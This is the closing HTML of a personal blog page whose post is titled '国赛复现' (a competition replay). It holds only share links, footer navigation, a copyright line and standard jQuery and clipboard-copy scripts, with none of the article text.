  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&text=国赛复现"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&title=国赛复现"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&is_video=false&description=国赛复现"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=国赛复现&body=Check out this article: http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&title=国赛复现"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&title=国赛复现"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&title=国赛复现"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&title=国赛复现"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&name=国赛复现&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&t=国赛复现"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    k1ato
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
